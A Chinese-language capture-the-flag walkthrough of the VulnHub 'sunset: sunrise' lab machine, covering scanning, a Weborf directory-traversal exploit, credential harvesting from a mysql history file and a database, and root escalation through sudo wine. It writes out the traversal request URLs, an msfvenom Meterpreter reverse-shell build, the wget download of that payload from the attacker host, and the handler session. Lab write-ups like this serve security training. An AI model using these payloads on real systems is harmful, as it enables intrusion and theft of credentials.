Vulnhub之Sunset:Sunrise靶机详细测试过程
Sunrise
靶机信息
名称:sunset: sunrise
地址:
https://www.vulnhub.com/entry/sunset-sunrise,406/
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:fb:2e:ff 1 60 PCS Systemtechnik GmbH
192.168.56.211 08:00:27:f6:ad:bf 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.211
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.211 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-10 00:23 EST
Nmap scan report for bogon (192.168.56.211)
Host is up (0.00016s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 37:dd:45:a2:9b:e7:bf:aa:30:e3:f0:96:ac:7c:0b:7c (RSA)
| 256 b4:c2:9b:4d:6f:86:67:02:cf:f6:43:8b:e2:64:ea:04 (ECDSA)
|_ 256 cb:f2:e6:cd:e3:e1:0f:bf:ce:e0:a2:3b:84:ae:97:74 (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.14.2
3306/tcp open mysql?
| fingerprint-strings:
| Kerberos, NULL, SMBProgNeg, X11Probe:
|_ Host '192.168.56.146' is not allowed to connect to this MariaDB server
8080/tcp open http-proxy Weborf (GNU/Linux)
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Page not found: Weborf (GNU/Linux)
| Content-Length: 202
| Content-Type: text/html
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| GetRequest:
| HTTP/1.1 200
| Server: Weborf (GNU/Linux)
| Content-Length: 326
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><tr style="background-color: #DFDFDF;"><td>d</td><td><a href="html/">html/</a></td><td>-</td></tr>
| </table><p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 200
| Server: Weborf (GNU/Linux)
| Allow: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
| DAV: 1,2
| DAV: <http://apache.org/dav/propset/fs/1>
| MS-Author-Via: DAV
| Socks5:
| HTTP/1.1 400 Bad request: Weborf (GNU/Linux)
| Content-Length: 199
| Content-Type: text/html
|_ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 400</H1>Bad request <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| http-webdav-scan:
| Allowed Methods: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
| WebDAV type: Apache DAV
|_ Server Type: Weborf (GNU/Linux)
|_http-title: Weborf
| http-methods:
|_ Potentially risky methods: PUT DELETE PROPFIND MKCOL COPY MOVE
|_http-server-header: Weborf (GNU/Linux)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3306-TCP:V=7.92%I=7%D=3/10%Time=640ABEE8%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.56\.146'\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Kerberos,
SF:4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.56\.146'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(SMBProgNeg,4
SF:D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.56\.146'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(X11Probe,4D,"
SF:I\0\0\x01\xffj\x04Host\x20'192\.168\.56\.146'\x20is\x20not\x20allowed\x
SF:20to\x20connect\x20to\x20this\x20MariaDB\x20server");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8080-TCP:V=7.92%I=7%D=3/10%Time=640ABEED%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,187,"HTTP/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU/Linux\)\r\
SF:nContent-Length:\x20326\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C/
SF:/DTD\x20HTML\x204\.01\x20Transitional//EN\"><html><head><title>Weborf</
SF:title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><
SF:tr\x20style=\"background-color:\x20#DFDFDF;\"><td>d</td><td><a\x20href=
SF:\"html/\">html/</a></td><td>-</td></tr>\n</table><p>Generated\x20by\x20
SF:Weborf/0\.12\.2\x20\(GNU/Linux\)</p></body></html>")%r(HTTPOptions,B2,"
SF:HTTP/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU/Linux\)\r\nAllow:\x20GET
SF:,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE\r\nDAV:\x201,2\r\nDAV
SF::\x20<http://apache\.org/dav/propset/fs/1>\r\nMS-Author-Via:\x20DAV\r\n
SF:\r\n")%r(RTSPRequest,B2,"HTTP/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU
SF:/Linux\)\r\nAllow:\x20GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,M
SF:OVE\r\nDAV:\x201,2\r\nDAV:\x20<http://apache\.org/dav/propset/fs/1>\r\n
SF:MS-Author-Via:\x20DAV\r\n\r\n")%r(FourOhFourRequest,12B,"HTTP/1\.1\x204
SF:04\x20Page\x20not\x20found:\x20Weborf\x20\(GNU/Linux\)\r\nContent-Lengt
SF:h:\x20202\r\nContent-Type:\x20text/html\r\n\r\n<!DOCTYPE\x20HTML\x20PUB
SF:LIC\x20\"-//W3C//DTD\x20HTML\x204\.01\x20Transitional//EN\"><html><head
SF:><title>Weborf</title></head><body>\x20<H1>Error\x20404</H1>Page\x20not
SF:\x20found\x20<p>Generated\x20by\x20Weborf/0\.12\.2\x20\(GNU/Linux\)</p>
SF:</body></html>")%r(Socks5,125,"HTTP/1\.1\x20400\x20Bad\x20request:\x20W
SF:eborf\x20\(GNU/Linux\)\r\nContent-Length:\x20199\r\nContent-Type:\x20te
SF:xt/html\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x20
SF:4\.01\x20Transitional//EN\"><html><head><title>Weborf</title></head><bo
SF:dy>\x20<H1>Error\x20400</H1>Bad\x20request\x20<p>Generated\x20by\x20Web
SF:orf/0\.12\.2\x20\(GNU/Linux\)</p></body></html>")%r(SIPOptions,B2,"HTTP
SF:/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU/Linux\)\r\nAllow:\x20GET,POS
SF:T,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE\r\nDAV:\x201,2\r\nDAV:\x2
SF:0<http://apache\.org/dav/propset/fs/1>\r\nMS-Author-Via:\x20DAV\r\n\r\n
SF:");
MAC Address: 08:00:27:F6:AD:BF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 145.63 seconds
NMAP扫描结果表明目标主机有4个开放端口:22(ssh)、80(http)、3306(mysql)、8080(http)
获得Shell
先看一下mysql有无弱口令:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ mysql -uroot -p -h 192.168.56.211
Enter password:
ERROR 1130 (HY000): Host '192.168.56.146' is not allowed to connect to this MariaDB server
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ nikto -h http://192.168.56.211
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.211
+ Target Hostname: 192.168.56.211
+ Target Port: 80
+ Start Time: 2023-03-10 00:40:23 (GMT-5)
---------------------------------------------------------------------------
+ Server: nginx/1.14.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7915 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2023-03-10 00:40:46 (GMT-5) (23 seconds)
---------------------------------------------------------------------------
结合NMAP扫描情况,是不是8080端口为代理服务器端口?(后注:这个假设是不存在的)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ gobuster dir -u http://192.168.56.211 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.211
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: txt,php,html,js,sh
[+] Timeout: 10s
===============================================================
2023/03/10 00:41:18 Starting gobuster in directory enumeration mode
===============================================================
Progress: 1320369 / 1323366 (99.77%)
===============================================================
2023/03/10 00:45:03 Finished
浏览器访问8080端口,返回页面可知:目标为Weborf 0.12.2
Weborf is a lightweight webserver designed to rapidly share directories.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ searchsploit Weborf
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
weborf 0.12.2 - Directory Traversal | linux/remote/14925.txt
Weborf HTTP Server - Denial of Service | multiple/dos/14012.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ searchsploit -m linux/remote/14925.txt
Exploit: weborf 0.12.2 - Directory Traversal
URL: https://www.exploit-db.com/exploits/14925
Path: /usr/share/exploitdb/exploits/linux/remote/14925.txt
File Type: ASCII text
Copied to: /home/kali/Desktop/Vulnhub/Sunrise/14925.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ cat 14925.txt
Title: Weborf httpd <= 0.12.2 Directory Traversal Vulnerability
Date: Sep 6, 2010
Author: Rew
Link: http://galileo.dmi.unict.it/wiki/weborf/doku.php
Version: 0.12.2
Tested On: Debian 5
CVE: N/A
=============================================================
Weborf httpd <= 0.12.2 suffers a directory traversal
vulnerability. This vulnerability could allow
attackers to read arbitrary files and hak th3 plan3t.
instance.c : line 240-244
------------------------------
void modURL(char* url) {
//Prevents the use of .. to access the whole filesystem <-- ORLY?
strReplace(url,"../",'\0');
replaceEscape(url);
------------------------------
Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
==============================================================
Stay safe,
Over and Out
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ curl http://192.168.56.211:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
avahi:x:107:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:108:118::/var/lib/saned:/usr/sbin/nologin
colord:x:109:119:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:110:7:HPLIP system user,,,:/var/run/hplip:/bin/false
sunrise:x:1000:1000:sunrise,,,:/home/sunrise:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
uuidd:x:111:120::/run/uuidd:/usr/sbin/nologin
rtkit:x:112:121:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
pulse:x:114:122:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
usbmux:x:115:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
geoclue:x:116:124::/var/lib/geoclue:/usr/sbin/nologin
tss:x:117:125:TPM2 software stack,,,:/var/lib/tpm:/bin/false
speech-dispatcher:x:118:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
lightdm:x:120:127:Light Display Manager:/var/lib/lightdm:/bin/false
weborf:x:1001:1001:,,,:/home/weborf:/bin/bash
mysql:x:121:128:MySQL Server,,,:/nonexistent:/bin/false
得到用户名: sunrise, weborf
有目录遍历漏洞,可以读取本地文件。
看是否可以读取ssh日志:/var/log/auth.log
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ curl http://192.168.56.211:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2flog%2fauth.log
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
看是否可以读取nginx访问日志:
─(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ curl http://192.168.56.211:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2flog%2fnginx%2faccess.log
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
接下来对/home目录的文件逐个访问(先访问目录,访问目录时不能确实%2f,否则出错):
http://192.168.56.211:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f
d ../ -
d Desktop/ -
d Documents/ -
d Downloads/ -
d Music/ -
d Pictures/ -
d Public/ -
d Templates/ -
d Videos/ -
f user.txt 33B
读取user.txt文件
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ curl http://192.168.56.211:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2fuser.txt
a6050aecf6303b0b824038807d823a89
访问:
http://192.168.56.211:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2fweborf-0.12.2%2f
尝试是否可以读取.bash_history:
http://192.168.56.211:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2f.bash_history
尝试是否可以读取.mysql_history
http://192.168.56.211:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f.mysql_history
成功得到返回:
show databases;
ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44';
因此得到连接数据库的用户名和密码。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ mysql -uweborf -p -h 192.168.56.211
Enter password:
ERROR 1130 (HY000): Host '192.168.56.146' is not allowed to connect to this MariaDB server
但是经过测试却无法连接上数据库,应该是只允许本地登录,是否该信息可以用于SSH?用该用户名和密码尝试ssh:
──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ ssh weborf@192.168.56.211
The authenticity of host '192.168.56.211 (192.168.56.211)' can't be established.
ED25519 key fingerprint is SHA256:arxmio0jKR/vILyC/2xCgJuUnoaiHJKIO8GG7ZRhzx8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.211' (ED25519) to the list of known hosts.
weborf@192.168.56.211's password:
Permission denied, please try again.
weborf@192.168.56.211's password:
Linux sunrise 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec 5 16:24:32 2019 from 192.168.1.146
weborf@sunrise:~$ id
uid=1001(weborf) gid=1001(weborf) groups=1001(weborf)
weborf@sunrise:~$ sudo -l
[sudo] password for weborf:
Sorry, user weborf may not run sudo on sunrise.
weborf@sunrise:~$
weborf@sunrise:~$ mysql -uweborf -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 79
Server version: 10.3.18-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
+--------------------+
3 rows in set (0.022 sec)
MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [mysql]> show tables;
+---------------------------+
| Tables_in_mysql |
+---------------------------+
| column_stats |
| columns_priv |
| db |
| event |
| func |
| general_log |
| gtid_slave_pos |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| index_stats |
| innodb_index_stats |
| innodb_table_stats |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| roles_mapping |
| servers |
| slow_log |
| table_stats |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| transaction_registry |
| user |
+---------------------------+
31 rows in set (0.001 sec)
MariaDB [mysql]> select * from user;
+-----------+---------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-------------+-------------------------------------------+------------------+---------+--------------+--------------------+
| Host | User | Password | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv | Alter_routine_priv | Create_user_priv | Event_priv | Trigger_priv | Create_tablespace_priv | Delete_history_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections | max_user_connections | plugin | authentication_string | password_expired | is_role | default_role | max_statement_time |
+-----------+---------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-------------+-------------------------------------------+------------------+---------+--------------+--------------------+
| localhost | root | *C7B6683EEB8FF8329D8390574FAA04DD04B87C58 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | unix_socket | *AF554C323F838EB43A3D464034692C0994346ED8 | N | N | | 0.000000 |
| localhost | sunrise | thefutureissobrightigottawearshades | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | | | N | N | | 0.000000 |
| localhost | weborf | *A76018C6BB42E371FD7B71D2EC6447AE6E37DB28 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | | | N | N | | 0.000000 |
+-----------+---------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-------------+-------------------------------------------+------------------+---------+--------------+--------------------+
3 rows in set (0.001 sec)
MariaDB [mysql]>
从数据库中得到了sunrise的密码,切换到该用户(假设同样的思路,数据库的用户信息用于系统)
提权
weborf@sunrise:~$ su - sunrise
Password:
sunrise@sunrise:~$ id
uid=1000(sunrise) gid=1000(sunrise) groups=1000(sunrise),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)
sunrise@sunrise:~$ sudo -l
[sudo] password for sunrise:
Matching Defaults entries for sunrise on sunrise:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sunrise may run the following commands on sunrise:
(root) /usr/bin/wine
sunrise@sunrise:~$
wine是可以运行windows程序的,因此可以用msfvenom生产windows的shell程序,上传至目标主机,然后利用wine执行该程序:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.146 LPORT=5555 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ ls
14925.txt nmap_full_scan shell.exe
sunrise@sunrise:~$ sudo /usr/bin/wine
Usage: wine PROGRAM [ARGUMENTS...] Run the specified program
wine --help Display this help and exit
wine --version Output version information and exit
sunrise@sunrise:~$ cd /tmp
sunrise@sunrise:/tmp$ wget http://192.168.56.146:8000/shell.exe
--2023-03-10 01:39:44-- http://192.168.56.146:8000/shell.exe
Connecting to 192.168.56.146:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73802 (72K) [application/x-msdos-program]
Saving to: ‘shell.exe’
shell.exe 100%[=====================================================>] 72.07K --.-KB/s in 0.001s
2023-03-10 01:39:44 (83.8 MB/s) - ‘shell.exe’ saved [73802/73802]
sunrise@sunrise:/tmp$ sudo /usr/bin/wine shell.exe
^Csunrise@sunrise:/tmp$ chmod 777 shell.exe
sunrise@sunrise:/tmp$ sudo /usr/bin/wine shell.exe
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.56.146 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.146:5555
[*] Sending stage (175686 bytes) to 192.168.56.211
[*] Meterpreter session 11 opened (192.168.56.146:5555 -> 192.168.56.211:50924) at 2023-03-10 02:11:17 -0500
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
[-] stdapi_sys_process_execute: Operation failed: The system cannot find the file specified.
meterpreter > id
[-] Unknown command: id
meterpreter > sessions
Usage: sessions <id>
Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>
meterpreter > sessions 11
[*] Session 11 is already interactive.
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
[-] stdapi_sys_process_execute: Operation failed: The system cannot find the file specified.
meterpreter > pwd
Z:\tmp
meterpreter > cd /root
meterpreter > ls
Listing: Z:\root
================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 1602 fil 2019-12-05 17:24:31 -0500 .ICEauthority
100666/rw-rw-rw- 104 fil 2019-12-05 17:40:27 -0500 .Xauthority
100666/rw-rw-rw- 96 fil 2019-12-05 17:54:41 -0500 .bash_history
100666/rw-rw-rw- 570 fil 2010-01-31 06:52:26 -0500 .bashrc
040777/rwxrwxrwx 0 dir 2019-12-04 17:46:24 -0500 .cache
040777/rwxrwxrwx 0 dir 2019-12-04 15:48:21 -0500 .config
100666/rw-rw-rw- 35 fil 2019-12-04 15:46:34 -0500 .dmrc
040777/rwxrwxrwx 0 dir 2019-12-04 15:48:12 -0500 .gnupg
040777/rwxrwxrwx 0 dir 2019-12-04 14:29:33 -0500 .local
040777/rwxrwxrwx 0 dir 2019-12-04 17:46:29 -0500 .mozilla
100666/rw-rw-rw- 0 fil 2019-12-04 16:56:11 -0500 .odbc.ini
100666/rw-rw-rw- 148 fil 2015-08-17 11:30:33 -0400 .profile
040777/rwxrwxrwx 0 dir 2019-12-04 14:48:28 -0500 .rpmdb
100666/rw-rw-rw- 66 fil 2019-12-05 16:08:41 -0500 .selected_editor
040777/rwxrwxrwx 0 dir 2019-12-04 15:47:54 -0500 .ssh
100666/rw-rw-rw- 252 fil 2019-12-05 14:59:00 -0500 .wget-hsts
100666/rw-rw-rw- 2211 fil 2019-12-05 17:24:30 -0500 .xsession-errors
100666/rw-rw-rw- 2211 fil 2019-12-05 13:51:40 -0500 .xsession-errors.old
040777/rwxrwxrwx 0 dir 2019-12-04 15:46:51 -0500 Desktop
040777/rwxrwxrwx 0 dir 2019-12-04 15:46:51 -0500 Documents
040777/rwxrwxrwx 0 dir 2019-12-04 15:46:51 -0500 Downloads
040777/rwxrwxrwx 0 dir 2007-08-29 11:03:27 -0400 Groups
040777/rwxrwxrwx 0 dir 2007-08-29 11:03:27 -0400 Logs
040777/rwxrwxrwx 0 dir 2019-12-04 16:33:15 -0500 Manual
040777/rwxrwxrwx 0 dir 2019-12-04 15:46:51 -0500 Music
040777/rwxrwxrwx 0 dir 2019-12-04 15:46:51 -0500 Pictures
040777/rwxrwxrwx 0 dir 2019-12-04 15:46:51 -0500 Public
040777/rwxrwxrwx 0 dir 2019-12-04 16:33:15 -0500 Readme
040777/rwxrwxrwx 0 dir 2019-12-04 15:46:51 -0500 Templates
040777/rwxrwxrwx 0 dir 2007-08-29 11:03:26 -0400 Users
040777/rwxrwxrwx 0 dir 2019-12-04 15:46:51 -0500 Videos
100666/rw-rw-rw- 701 fil 2019-12-05 17:22:55 -0500 root.txt
meterpreter > cat root.txt
^^ @@@@@@@@@
^^ ^^ @@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@ ^^
@@@@@@@@@@@@@@@@@@@@
~~~~ ~~ ~~~~~ ~~~~~~~~ ~~ &&&&&&&&&&&&&&&&&&&& ~~~~~~~ ~~~~~~~~~~~ ~~~
~ ~~ ~ ~ ~~~~~~~~~~~~~~~~~~~~ ~ ~~ ~~ ~
~ ~~ ~~ ~~ ~~ ~~~~~~~~~~~~~ ~~~~ ~ ~~~ ~ ~~~ ~ ~~
~ ~~ ~ ~ ~~~~~~ ~~ ~~~ ~~ ~ ~~ ~~ ~
~ ~ ~ ~ ~ ~~ ~~~~~~ ~ ~~ ~ ~~
~ ~ ~ ~ ~~ ~ ~
Thanks for playing! - Felipe Winsnes (@whitecr0wz)
24edb59d21c273c033aa6f1689b0b18c
meterpreter >
经验教训
-
